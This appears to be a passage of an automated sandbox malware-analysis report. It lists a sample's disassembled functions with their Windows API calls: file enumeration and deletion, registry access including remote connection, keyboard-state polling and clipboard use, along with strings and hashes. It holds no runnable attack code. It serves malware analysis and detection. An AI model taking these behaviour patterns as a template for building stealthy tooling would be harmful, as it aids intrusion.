FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0066C81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 0066C844
__swprintf.LIBCMT ref: 0066C890
__swprintf.LIBCMT ref: 0066C8D3

Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22

__swprintf.LIBCMT ref: 0066C927

Part of subcall function 00623698: __woutput_l.LIBCMT ref: 006236F1

__swprintf.LIBCMT ref: 0066C975

Part of subcall function 00623698: __flsbuf.LIBCMT ref: 00623713
Part of subcall function 00623698: __flsbuf.LIBCMT ref: 0062372B

__swprintf.LIBCMT ref: 0066C9C4
__swprintf.LIBCMT ref: 0066CA13
__swprintf.LIBCMT ref: 0066CA62

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 0066C88A
%4d, xrefs: 0066C8CD
%02d, xrefs: 0066C91B, 0066C925, 0066C973, 0066C9C2, 0066CA11, 0066CA60

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: b545af888bcbacc11c673016a264ea96ecc911ee79a5fcde25674c05ed20c425
Instruction ID: 3e29ea744a79b35e9779e5f63c0121957029011983569028dd5a7da4ac6bd372
Opcode Fuzzy Hash: b545af888bcbacc11c673016a264ea96ecc911ee79a5fcde25674c05ed20c425
Instruction Fuzzy Hash: FFA11DB1448244AFC754EFA4C885DAFB7EEAF94700F40491EF59587292EB34DA08CB66

Function 0066EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0066EFB6
_wcscmp.LIBCMT ref: 0066EFCB
_wcscmp.LIBCMT ref: 0066EFE2
GetFileAttributesW.KERNEL32(?), ref: 0066EFF4
SetFileAttributesW.KERNEL32(?,?), ref: 0066F00E
FindNextFileW.KERNEL32(00000000,?), ref: 0066F026
FindClose.KERNEL32(00000000), ref: 0066F031
FindFirstFileW.KERNEL32(*.*,?), ref: 0066F04D
_wcscmp.LIBCMT ref: 0066F074
_wcscmp.LIBCMT ref: 0066F08B
SetCurrentDirectoryW.KERNEL32(?), ref: 0066F09D
SetCurrentDirectoryW.KERNEL32(006B8920), ref: 0066F0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 0066F0C5
FindClose.KERNEL32(00000000), ref: 0066F0D2
FindClose.KERNEL32(00000000), ref: 0066F0E4

Strings

*.*, xrefs: 0066F048

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 6536d1aabf79aa1696e835cb0ddedbab3af1e5987b80f7bcd9bf044f71a3beab
Instruction ID: ded4fe3f847eabecc7d78d3a38da6d2a38e212ae62514c95836be379f675a232
Opcode Fuzzy Hash: 6536d1aabf79aa1696e835cb0ddedbab3af1e5987b80f7bcd9bf044f71a3beab
Instruction Fuzzy Hash: 6A31C2325012197BDB14EFA4EC69AEE77AE9F48360F100275E804E32A1DB75DE84CB65

Function 00680857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00680953
RegCreateKeyExW.ADVAPI32(?,?,00000000,0068F910,00000000,?,00000000,?,?), ref: 006809C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00680A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00680A92
RegCloseKey.ADVAPI32(?), ref: 00680DB2
RegCloseKey.ADVAPI32(00000000), ref: 00680DBF

Strings

REG_QWORD, xrefs: 00680D00
REG_SZ, xrefs: 00680AD0
REG_EXPAND_SZ, xrefs: 00680A2F
REG_BINARY, xrefs: 00680D4D
REG_MULTI_SZ, xrefs: 00680B7A
REG_DWORD, xrefs: 00680C83

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 26461342c8df24286bf3eff5e4011940641011b05d0d1e50c8670be21aadf18d
Instruction ID: 30ef9fe2bad2bbe892ac19f2270d3c20baea2e07ae87c6cd0b4780f967d940df
Opcode Fuzzy Hash: 26461342c8df24286bf3eff5e4011940641011b05d0d1e50c8670be21aadf18d
Instruction Fuzzy Hash: 110247756006019FDB94EF24D851E6AB7E6FF89314F04895CF88A9B3A2CB30EC45CB95

Function 006166E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON

Download Yara Rule

Strings

LIMIT_RECURSION=, xrefs: 006511FC
0Fj, xrefs: 00616747
0Dj, xrefs: 00616733
0Ej, xrefs: 0061673D
_a, xrefs: 00651465, 0065150C, 006515B4
UCP), xrefs: 0065110D
BSR_ANYCRLF), xrefs: 0065131E
3ca, xrefs: 006168FF
NO_AUTO_POSSESS), xrefs: 0065112E
ANYCRLF), xrefs: 006512FB
pGj, xrefs: 00616751
CR), xrefs: 00651287
CRLF), xrefs: 006512C1
NO_START_OPT), xrefs: 0065114F
ANY), xrefs: 006512DE
UTF16), xrefs: 006510CF
BSR_UNICODE), xrefs: 00651338
LIMIT_MATCH=, xrefs: 00651170
LF), xrefs: 006512A4
UTF), xrefs: 006510FA

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID:
String ID: 0Dj$0Ej$0Fj$3ca$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGj$_a
API String ID: 0-3163205990
Opcode ID: 8654c20fff7ffc857ea89dbb79806cb797328905965db048700a25ba5440b9b0
Instruction ID: bec5bcfc7f3141fcf00b2dc3213e3ae7d2cacdc9a6763e5727d9d1a0ee7bc401
Opcode Fuzzy Hash: 8654c20fff7ffc857ea89dbb79806cb797328905965db048700a25ba5440b9b0
Instruction Fuzzy Hash: 2E726EB5E002199BDB24CF59C8907EEB7B6FF45311F14816AE805EB391EB709A85CB90

Function 0066F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0066F113
_wcscmp.LIBCMT ref: 0066F128
_wcscmp.LIBCMT ref: 0066F13F

Part of subcall function 00664385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 006643A0

FindNextFileW.KERNEL32(00000000,?), ref: 0066F16E
FindClose.KERNEL32(00000000), ref: 0066F179
FindFirstFileW.KERNEL32(*.*,?), ref: 0066F195
_wcscmp.LIBCMT ref: 0066F1BC
_wcscmp.LIBCMT ref: 0066F1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 0066F1E5
SetCurrentDirectoryW.KERNEL32(006B8920), ref: 0066F203
FindNextFileW.KERNEL32(00000000,00000010), ref: 0066F20D
FindClose.KERNEL32(00000000), ref: 0066F21A
FindClose.KERNEL32(00000000), ref: 0066F22C

Strings

*.*, xrefs: 0066F190

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 38ace7d790c71192501418e89127854a69190cf704af55fe51e70e8333e3f6cd
Instruction ID: 2d53e31e8809b62016a79b969457b3a5d77450100fd79b994a4b3aa512217a5d
Opcode Fuzzy Hash: 38ace7d790c71192501418e89127854a69190cf704af55fe51e70e8333e3f6cd
Instruction Fuzzy Hash: 2531A4365002197ADB10AFA4FC69AEE77AE9F45360F100275E904E3290DB71DF85CF64

Function 0066A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0066A20F
__swprintf.LIBCMT ref: 0066A231
CreateDirectoryW.KERNEL32(?,00000000), ref: 0066A26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0066A293
_memset.LIBCMT ref: 0066A2B2
_wcsncpy.LIBCMT ref: 0066A2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0066A323
CloseHandle.KERNEL32(00000000), ref: 0066A32E
RemoveDirectoryW.KERNEL32(?), ref: 0066A337
CloseHandle.KERNEL32(00000000), ref: 0066A341

Strings

:, xrefs: 0066A252
\??\%s, xrefs: 0066A22B
\, xrefs: 0066A247

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 845ee2d403ac335d2dfe9dfdc52141a845c01f0a73963e36956676980b95ec5e
Instruction ID: 06723ab472922bc4fdafb7bd6a8c23eb95d1a8a39c1da24185ff2d12c0de679d
Opcode Fuzzy Hash: 845ee2d403ac335d2dfe9dfdc52141a845c01f0a73963e36956676980b95ec5e
Instruction Fuzzy Hash: 47319FB1500119BBDB209FA0DC49FEB77BEEF88700F1041B6F508E2260EB7196448F65

Function 0066001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00660097
SetKeyboardState.USER32(?), ref: 00660102
GetAsyncKeyState.USER32(000000A0), ref: 00660122
GetKeyState.USER32(000000A0), ref: 00660139
GetAsyncKeyState.USER32(000000A1), ref: 00660168
GetKeyState.USER32(000000A1), ref: 00660179
GetAsyncKeyState.USER32(00000011), ref: 006601A5
GetKeyState.USER32(00000011), ref: 006601B3
GetAsyncKeyState.USER32(00000012), ref: 006601DC
GetKeyState.USER32(00000012), ref: 006601EA
GetAsyncKeyState.USER32(0000005B), ref: 00660213
GetKeyState.USER32(0000005B), ref: 00660221

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 906ed54ac380cc74e122a3982ba94106c5e81db2acd152223ee51bea6e0b8671
Instruction ID: 4a31a41cc4434d3aacc975e395506284aeafb6d91151087bd00d22e70108808c
Opcode Fuzzy Hash: 906ed54ac380cc74e122a3982ba94106c5e81db2acd152223ee51bea6e0b8671
Instruction Fuzzy Hash: 8451DA3090478829FB35DBA088547EBFFB69F12380F0845ADD5C25A6C2DAA49B8CC761

Function 006803DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00680E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0067FDAD,?,?), ref: 00680E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006804AC

Part of subcall function 00609837: __itow.LIBCMT ref: 00609862
Part of subcall function 00609837: __swprintf.LIBCMT ref: 006098AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0068054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 006805E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00680822
RegCloseKey.ADVAPI32(00000000), ref: 0068082F

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: cf4bd73a8ce8756707e0c4f4ddd9735ed88b3014e6910eb019d0a076a154ffae
Instruction ID: ffb17535fd47f78b0ed381d89f15dc2f8907c12e58fa9345bdd273088a506805
Opcode Fuzzy Hash: cf4bd73a8ce8756707e0c4f4ddd9735ed88b3014e6910eb019d0a076a154ffae
Instruction Fuzzy Hash: 72E15E71604200AFDB54EF24C891D6BBBE6EF89314F04896DF84ADB3A2D731E945CB91

Function 006783BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00609837: __itow.LIBCMT ref: 00609862
Part of subcall function 00609837: __swprintf.LIBCMT ref: 006098AC

CoInitialize.OLE32 ref: 00678403
CoUninitialize.OLE32 ref: 0067840E
CoCreateInstance.OLE32(?,00000000,00000017,00692BEC,?), ref: 0067846E
IIDFromString.OLE32(?,?), ref: 006784E1
VariantInit.OLEAUT32(?), ref: 0067857B
VariantClear.OLEAUT32(?), ref: 006785DC

Strings

NULL Pointer assignment, xrefs: 006784B3
Invalid parameter, xrefs: 006784FA
Failed to create object, xrefs: 00678479, 0067852F

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 4822497cc6e1d273f7dcd4ebd0b8ca50e1eb000b1a27fdae9494f00277699e5f
Instruction ID: 6cdd908f4444d226cd3446acb95cdf3923930c86da2308716492aa632210b74a
Opcode Fuzzy Hash: 4822497cc6e1d273f7dcd4ebd0b8ca50e1eb000b1a27fdae9494f00277699e5f
Instruction Fuzzy Hash: 1661B170648312AFD750DF24C848FAEB7EAAF45754F00891DF9899B291CB70ED45CB92

Function 00674164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0067418B
EmptyClipboard.USER32 ref: 00674191
GlobalAlloc.KERNEL32(00000002,?), ref: 006741A6
CloseClipboard.USER32 ref: 00674245

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 6131cfc235d7caf5df9f15bcb8886aa2aa843a410c4367df399ce7a7ec2829f4
Instruction ID: 01ad616cdf04e33a5154e72a65a867211b036e60813e539223cdc24de54c4e1f
Opcode Fuzzy Hash: 6131cfc235d7caf5df9f15bcb8886aa2aa843a410c4367df399ce7a7ec2829f4
Instruction Fuzzy Hash: 2821A375200210AFDB10AF64DC19B6E7BABEF04751F10C629F94ADB3A2DB30AD41CB54

Function 006637EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00604750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00604743,?,?,006037AE,?), ref: 00604770

Part of subcall function 00664A31: GetFileAttributesW.KERNEL32(?,0066370B), ref: 00664A32

FindFirstFileW.KERNEL32(?,?), ref: 006638A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0066394B
MoveFileW.KERNEL32(?,?), ref: 0066395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0066397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 0066399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 006639B9

Strings

\*.*, xrefs: 0066384E, 00663857, 0066386C

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: c894ec2f4d3c14a7638fabf241c90a16f097019ff0de1b73cafd2db8515512b3
Instruction ID: 2c3ed30f81af41f6423a1b53d0a717bc4d376dc6a83be4d43f3fe9eb23e20b68
Opcode Fuzzy Hash: c894ec2f4d3c14a7638fabf241c90a16f097019ff0de1b73cafd2db8515512b3
Instruction Fuzzy Hash: C7517C3184515DAACF09EBA0DA929EEB77AAF14304F60016DE406B72D1EF316F09CF64

Function 0066F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0066F440
Sleep.KERNEL32(0000000A), ref: 0066F470
_wcscmp.LIBCMT ref: 0066F484
_wcscmp.LIBCMT ref: 0066F49F
FindNextFileW.KERNEL32(?,?), ref: 0066F53D
FindClose.KERNEL32(00000000), ref: 0066F553

Strings

*.*, xrefs: 0066F425

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: b7f50c055758fd0a34b682837903a6d057accbfab0896b1c5f5e78a5968e2477
Instruction ID: bc746d266c5c477fabdfd6367a46e6b5ac76dc73bfce7b189869271e62e68f23
Opcode Fuzzy Hash: b7f50c055758fd0a34b682837903a6d057accbfab0896b1c5f5e78a5968e2477
Instruction Fuzzy Hash: A741907184021AAFCF54EF64DC45AEEBBB6FF14310F10416AE815A3291EB30AE94CF50

Function 00613030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON

Download Yara Rule

Strings

_a, xrefs: 00613322
3ca, xrefs: 00613225

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: __itow__swprintf
String ID: 3ca$_a
API String ID: 674341424-1000881220
Opcode ID: 0d4df5fd9f22dcae88a9a0da954c80b1e8844828c00f636febc827910143e090
Instruction ID: 2886e6d997baa2c20cfd271fa19f1845d77ae42e4f0000eed16819d93d587505
Opcode Fuzzy Hash: 0d4df5fd9f22dcae88a9a0da954c80b1e8844828c00f636febc827910143e090
Instruction Fuzzy Hash: 0922CE716083109FD764DF24C881BAFB7E6AF85300F04492DF89A97392DB71EA45CB96

Function 00615760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006158A5
_memmove.LIBCMT ref: 006158F5
_memmove.LIBCMT ref: 0061595B

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 9d44ee0c84c83531a1a7e15bacbb4d8683a2dcd4dabcce3d05f40cd3a6b1e3c4
Instruction ID: 234c97531f5c9b5192d34769460d5013b195676a1086febe676d4724cf6ebd5c
Opcode Fuzzy Hash: 9d44ee0c84c83531a1a7e15bacbb4d8683a2dcd4dabcce3d05f40cd3a6b1e3c4
Instruction Fuzzy Hash: 1512AA70A00A09EFDF04CFA5D981AEEF3F6FF88300F144529E846A7290EB35A955CB55

Function 00663B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00604750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00604743,?,?,006037AE,?), ref: 00604770

Part of subcall function 00664A31: GetFileAttributesW.KERNEL32(?,0066370B), ref: 00664A32

FindFirstFileW.KERNEL32(?,?), ref: 00663B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 00663BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 00663BEA
FindClose.KERNEL32(00000000), ref: 00663C01
FindClose.KERNEL32(00000000), ref: 00663C0A

Strings

\*.*, xrefs: 00663B5B

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
